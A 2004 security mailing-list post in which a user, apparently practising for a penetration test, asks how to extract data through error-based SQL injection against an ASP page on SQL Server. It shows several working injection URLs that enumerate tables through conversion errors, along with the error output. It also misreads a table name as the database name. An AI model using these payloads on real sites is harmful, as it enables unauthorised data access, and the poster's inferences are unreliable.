WebApp Sec mailing list archives
SQL Injection data retrieving??
From: Roland Despins <roland2004 () romandie com>
Date: 10 Sep 2004 12:06:56 -0000
Hi, I'm practicing myself for a pentest. I'm trying to retrieve datas from a DB using some SQL injections.
From now I asume that my WebApp is vulnerable to SQLinjections.
First I've sent this URL: www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc)) And I've goot the following error: Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__big_field' to a column of data type int. /products.asp, line 32 I assume that "__big_field" is the name of the databse? Right? Secondly I've sent the the following URL in order to get the table name: www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc)) Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__dellist' to a column of data type int. /products.asp, line 32 So "__dellist" is a table from the "__big_field" database? Right? Now here comes the troubles... I would like to retrieve the columns name of the "__dellist" table and the data of the "__dellist". I've sent: www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1)) Error Type: Microsoft OLE DB Provider for SQL Server (0x80004005) Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression. /products.asp, line 32 My question is: Which query should I sent i order to retrieve the data of the table?? Thanks a lot in advance for your help Roland
Current thread:
- SQL Injection data retrieving?? Roland Despins (Sep 10)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- Re: SQL Injection data retrieving?? nummish (Sep 11)
- Re: SQL Injection data retrieving?? Ben Timby (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 11)
- Re: SQL Injection data retrieving?? Adam Tuliper (Sep 12)
- Re: SQL Injection data retrieving?? saphyr (Sep 12)
- <Possible follow-ups>
- Re: SQL Injection data retrieving?? Roland Despins (Sep 12)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 13)
- RE: SQL Injection data retrieving?? Mark McDonald (Sep 13)
(Thread continues...)
- Re: SQL Injection data retrieving?? Jonathan Angliss (Sep 11)